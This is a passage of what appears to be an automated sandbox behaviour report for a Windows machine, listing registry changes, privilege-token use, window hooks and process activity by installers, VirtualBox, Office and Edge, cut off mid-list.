DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@Winlangdb.dll,-1121 = "English (United States)" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe -
Modifies registry class 64 IoCs
Processes:
VirtualBox.exeMsiExec.exemsiexec.exeexplorer.exeexplorer.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A06253A7-DCD2-44E3-8689-9C9C4B6B6234}\ProxyStubClsid32 VirtualBox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E595F05F-903F-4318-8B0A-7F633B520D2B}\InprocServer32\ = "C:\\Windows\\system32\\StartMenuHelper64.dll" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{00F4A8DC-0002-4B81-0077-1DCB004571BA}\NumMethods\ = "48" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{AF398A9A-6B76-4805-8FAB-00A9DCF4732B}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{B1D978B8-F7B7-4B05-900E-2A9253C00F51}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{92ED7B1A-0D96-40ED-AE46-A564D484325E}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A443DA5B-AA82-4720-BC84-BD097B2B13B8}\TypeLib\Version = "1.3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{B31C4052-7BDC-11E9-8BC2-8FFDB8B19219}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{0FE2DA40-5637-472A-9736-72019EABD7DE}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{4376693C-CF37-453B-9289-3B0F521CAF27}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{3DB2AB1A-6CF7-42F1-8BF5-E1C0553E0B30}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{53FAC49A-B7F1-4A5A-A4EF-A11DD9C2A458}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{78861431-D545-44AA-8013-181B8C288554}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9DB3A9E6-7F29-4AAE-A627-5A282C83092C}\ProxyStubClsid32 VirtualBox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20479EAF-D8ED-44CF-85AC-C83A26C95A4D}\TypeLib VirtualBox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{dd3fc71d-26c0-4fe1-bf6f-67f633265bba} VirtualBox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2514881B-23D0-430A-A7FF-7ED7F05534BC}\NumMethods\ = "22" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\25\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{147816C8-17E0-11EB-81FA-87CEA6263E1A}\ = "ICloudMachine" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{726EACA9-091E-41B4-BCA6-355EFE864107}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C984D15F-E191-400B-840E-970F3DAD7296}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E062A915-3CF5-4C0A-BC90-9B8D4CC94D89}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{F4D803B4-9B2D-4377-BFE6-9702E881516B}\ProxyStubClsid32 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{B79DE686-EABD-4FA6-960A-F1756C99EA1C} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C365FB7B-4430-499F-92C8-8BED814A567A}\TypeLib\Version = "1.3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{E7932CB8-F6D4-4AB6-9CBF-558EB8959A6A} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\VirtualBox.VirtualBox\CurVer msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{024F00CE-6E0B-492A-A8D0-968472A94DC7} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{883DD18B-0721-4CDE-867C-1A82ABAF914C}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{35CF4B3F-4453-4F3E-C9B8-5686939C80B6}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{4EE3CBCB-486F-40DB-9150-DEEE3FD24189}\ProxyStubClsid32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{81314D14-FD1C-411A-95C5-E9BB1414E632}\NumMethods\ = "23" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A06253A7-DCD2-44E3-8689-9C9C4B6B6234}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{CFDE1265-3140-4048-A81F-A1E280DFBD75}\ProxyStubClsid32 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{FF5BEFC3-4BA3-7903-2AA4-43988BA11554} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{1E775EA3-9070-4F9C-B0D5-53054496DBE0}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F05D7E60-1BCF-4218-9807-04E036CC70F1}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{07541941-8079-447A-A33E-47A69C7980DB}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{392F1DE4-80E1-4A8A-93A1-67C5F92A838A}\ProxyStubClsid32 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{6DDEF35E-4737-457B-99FC-BC52C851A44F}\ProxyStubClsid32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0B3CDEB2-808E-11E9-B773-133D9330F849}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D89E2B3-C6EA-45B6-9D43-DC6F70CC9F02}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{9709DB9B-3346-49D6-8F1C-41B0C4784FF2}\ProxyStubClsid32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6CC49055-DAD4-4496-85CF-3F76BCB3B5FA}\TypeLib\Version = "1.3" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\WinPos1024x768x96(1).bottom = "705" explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{334DF94A-7556-4CBC-8C04-043096B02D82}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{70E2E0C3-332C-4D72-B822-2DB16E2CB31B} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{B9ACD33F-647D-45AC-8FE9-F49B3183BA37}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{CF11D345-0241-4EA9-AC4C-C69ED3D674E3} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{67099191-32E7-4F6C-85EE-422304C71B90}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DFA7E4F5-B4A4-44CE-85A8-127AC5EB59DC}\NumMethods\ = "13" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{F01F1066-F231-11EA-8EEE-33BB2AFB0B6E} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{00892186-A4AF-4627-B21F-FC561CE4473C} msiexec.exe Key created \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fhcpl.dll,-2#immutable1 = "Keep a history of your files" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2405F0E5-6588-40A3-9B0A-68C05BA52C4B}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{245D88BD-800A-40F8-87A6-170D02249A55}\TypeLib\Version = "1.3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{C48F3401-4A9E-43F4-B7A7-54BD285E22F4}\ProxyStubClsid32 msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\4\0\NodeSlot = "26" explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{024F00CE-6E0B-492A-A8D0-968472A94DC7}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{0FE2DA40-5637-472A-9736-72019EABD7DE}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{67C50AFE-3E78-11E9-B25E-7768F80C0E07}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{FF58A51D-54A1-411C-93E9-3047EB4DCD21}\ProxyStubClsid32 msiexec.exe -
Modifies registry key 1 TTPs 32 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 4568 reg.exe 4672 reg.exe 2216 reg.exe 2464 reg.exe 1056 reg.exe 5296 reg.exe 1744 reg.exe 5780 reg.exe 2604 reg.exe 800 reg.exe 1824 reg.exe 6124 reg.exe 5760 reg.exe 5056 reg.exe 2204 reg.exe 3976 reg.exe 632 reg.exe 4948 reg.exe 3736 reg.exe 2964 reg.exe 4760 reg.exe 560 reg.exe 1400 reg.exe 2124 reg.exe 2636 reg.exe 1312 reg.exe 1224 reg.exe 2460 reg.exe 5392 reg.exe 768 reg.exe 1768 reg.exe 1100 reg.exe -
NTFS ADS 3 IoCs
Processes:
msedge.exemsedge.exemsedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 169237.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 988065.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 800032.crdownload:SmartScreen msedge.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 19 IoCs
Processes:
WINWORD.EXEexplorer.exeexplorer.exeWINWORD.EXEVirtualBox.exeVirtualBoxVM.exeexplorer.exeONENOTE.EXEpid process 1712 WINWORD.EXE 1712 WINWORD.EXE 5888 explorer.exe 5888 explorer.exe 6096 explorer.exe 6096 explorer.exe 6096 explorer.exe 4804 WINWORD.EXE 4804 WINWORD.EXE 5840 VirtualBox.exe 2676 VirtualBoxVM.exe 964 explorer.exe 5328 ONENOTE.EXE 5328 ONENOTE.EXE 964 explorer.exe 964 explorer.exe 964 explorer.exe 964 explorer.exe 964 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsiexec.exemsedge.exemsedge.exemspaint.exemspaint.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3928 msedge.exe 3928 msedge.exe 4512 msedge.exe 4512 msedge.exe 1660 identity_helper.exe 1660 identity_helper.exe 6128 msedge.exe 6128 msedge.exe 2016 msedge.exe 2016 msedge.exe 2356 identity_helper.exe 2356 identity_helper.exe 3812 msedge.exe 3812 msedge.exe 5332 msedge.exe 5332 msedge.exe 1048 identity_helper.exe 1048 identity_helper.exe 4372 msedge.exe 4372 msedge.exe 3296 msedge.exe 3296 msedge.exe 3296 msedge.exe 3296 msedge.exe 4300 msedge.exe 4300 msedge.exe 4328 msiexec.exe 4328 msiexec.exe 5724 msedge.exe 5724 msedge.exe 5604 msedge.exe 5604 msedge.exe 3016 mspaint.exe 3016 mspaint.exe 1484 mspaint.exe 1484 mspaint.exe 2640 msedge.exe 2640 msedge.exe 2328 msedge.exe 2328 msedge.exe 1036 identity_helper.exe 1036 identity_helper.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4196 msedge.exe 4196 msedge.exe 1236 powershell.exe 1236 powershell.exe 1236 powershell.exe 1536 powershell.exe 1536 powershell.exe 1536 powershell.exe 5608 powershell.exe 5608 powershell.exe 5608 powershell.exe 5536 powershell.exe 5536 powershell.exe 5536 powershell.exe 5124 powershell.exe 5124 powershell.exe 2792 powershell.exe 2792 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 6 IoCs
Processes:
RetroBar.exemsiexec.exeVirtualBox.exeWINWORD.EXEmmc.exeexplorer.exepid process 3320 RetroBar.exe 2304 msiexec.exe 5840 VirtualBox.exe 4804 WINWORD.EXE 4068 mmc.exe 964 explorer.exe -
Suspicious behavior: LoadsDriver 4 IoCs
Processes:
pid process 664 664 664 664 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
Processes:
msedge.exemsedge.exemsedge.exemsedge.exemsedge.exepid process 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 2328 msedge.exe 2328 msedge.exe 2328 msedge.exe 2328 msedge.exe 2328 msedge.exe 2328 msedge.exe 2328 msedge.exe 2328 msedge.exe 2328 msedge.exe 2328 msedge.exe 2328 msedge.exe 2328 msedge.exe 5432 msedge.exe 5432 msedge.exe 5432 msedge.exe 5432 msedge.exe 5432 msedge.exe 5432 msedge.exe 5432 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wmplayer.exeunregmp2.exesvchost.exeRetroBar.exemsiexec.exemsiexec.exevssvc.exesrtasks.exeMsiExec.exedescription pid process Token: SeShutdownPrivilege 2724 wmplayer.exe Token: SeCreatePagefilePrivilege 2724 wmplayer.exe Token: SeShutdownPrivilege 1176 unregmp2.exe Token: SeCreatePagefilePrivilege 1176 unregmp2.exe Token: SeTcbPrivilege 1096 svchost.exe Token: SeRestorePrivilege 1096 svchost.exe Token: SeDebugPrivilege 3320 RetroBar.exe Token: SeShutdownPrivilege 2304 msiexec.exe Token: SeIncreaseQuotaPrivilege 2304 msiexec.exe Token: SeSecurityPrivilege 4328 msiexec.exe Token: SeCreateTokenPrivilege 2304 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2304 msiexec.exe Token: SeLockMemoryPrivilege 2304 msiexec.exe Token: SeIncreaseQuotaPrivilege 2304 msiexec.exe Token: SeMachineAccountPrivilege 2304 msiexec.exe Token: SeTcbPrivilege 2304 msiexec.exe Token: SeSecurityPrivilege 2304 msiexec.exe Token: SeTakeOwnershipPrivilege 2304 msiexec.exe Token: SeLoadDriverPrivilege 2304 msiexec.exe Token: SeSystemProfilePrivilege 2304 msiexec.exe Token: SeSystemtimePrivilege 2304 msiexec.exe Token: SeProfSingleProcessPrivilege 2304 msiexec.exe Token: SeIncBasePriorityPrivilege 2304 msiexec.exe Token: SeCreatePagefilePrivilege 2304 msiexec.exe Token: SeCreatePermanentPrivilege 2304 msiexec.exe Token: SeBackupPrivilege 2304 msiexec.exe Token: SeRestorePrivilege 2304 msiexec.exe Token: SeShutdownPrivilege 2304 msiexec.exe Token: SeDebugPrivilege 2304 msiexec.exe Token: SeAuditPrivilege 2304 msiexec.exe Token: SeSystemEnvironmentPrivilege 2304 msiexec.exe Token: SeChangeNotifyPrivilege 2304 msiexec.exe Token: SeRemoteShutdownPrivilege 2304 msiexec.exe Token: SeUndockPrivilege 2304 msiexec.exe Token: SeSyncAgentPrivilege 2304 msiexec.exe Token: SeEnableDelegationPrivilege 2304 msiexec.exe Token: SeManageVolumePrivilege 2304 msiexec.exe Token: SeImpersonatePrivilege 2304 msiexec.exe Token: SeCreateGlobalPrivilege 2304 msiexec.exe Token: SeBackupPrivilege 6096 vssvc.exe Token: SeRestorePrivilege 6096 vssvc.exe Token: SeAuditPrivilege 6096 vssvc.exe Token: SeBackupPrivilege 4328 msiexec.exe Token: SeRestorePrivilege 4328 msiexec.exe Token: SeRestorePrivilege 4328 msiexec.exe Token: SeTakeOwnershipPrivilege 4328 msiexec.exe Token: SeRestorePrivilege 4328 msiexec.exe Token: SeTakeOwnershipPrivilege 4328 msiexec.exe Token: SeBackupPrivilege 4324 srtasks.exe Token: SeRestorePrivilege 4324 srtasks.exe Token: SeSecurityPrivilege 4324 srtasks.exe Token: SeTakeOwnershipPrivilege 4324 srtasks.exe Token: SeBackupPrivilege 4912 MsiExec.exe Token: SeRestorePrivilege 4912 MsiExec.exe Token: SeRestorePrivilege 4328 msiexec.exe Token: SeTakeOwnershipPrivilege 4328 msiexec.exe Token: SeRestorePrivilege 4328 msiexec.exe Token: SeTakeOwnershipPrivilege 4328 msiexec.exe Token: SeRestorePrivilege 4328 msiexec.exe Token: SeTakeOwnershipPrivilege 4328 msiexec.exe Token: SeRestorePrivilege 4328 msiexec.exe Token: SeTakeOwnershipPrivilege 4328 msiexec.exe Token: SeRestorePrivilege 4328 msiexec.exe Token: SeTakeOwnershipPrivilege 4328 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exewmplayer.exemsedge.exemsedge.exepid process 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 2724 wmplayer.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
msedge.exemsedge.exemsedge.exepid process 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 4512 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 2016 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe 5332 msedge.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
ClassicStartMenu.exemsedge.exemspaint.exeWINWORD.EXEmspaint.exemsedge.exemspaint.exeSystemSettingsAdminFlows.exeWINWORD.EXEVirtualBox.exeVirtualBoxVM.exeONENOTE.EXEpid process 1080 ClassicStartMenu.exe 5724 msedge.exe 3016 mspaint.exe 3016 mspaint.exe 3016 mspaint.exe 3016 mspaint.exe 1712 WINWORD.EXE 1712 WINWORD.EXE 1712 WINWORD.EXE 1712 WINWORD.EXE 1712 WINWORD.EXE 1712 WINWORD.EXE 1712 WINWORD.EXE 1712 WINWORD.EXE 1712 WINWORD.EXE 1712 WINWORD.EXE 1080 ClassicStartMenu.exe 1484 mspaint.exe 1484 mspaint.exe 1484 mspaint.exe 1484 mspaint.exe 1484 mspaint.exe 4524 msedge.exe 5812 mspaint.exe 5812 mspaint.exe 5812 mspaint.exe 5812 mspaint.exe 2504 SystemSettingsAdminFlows.exe 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 5840 VirtualBox.exe 4804 WINWORD.EXE 2676 VirtualBoxVM.exe 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 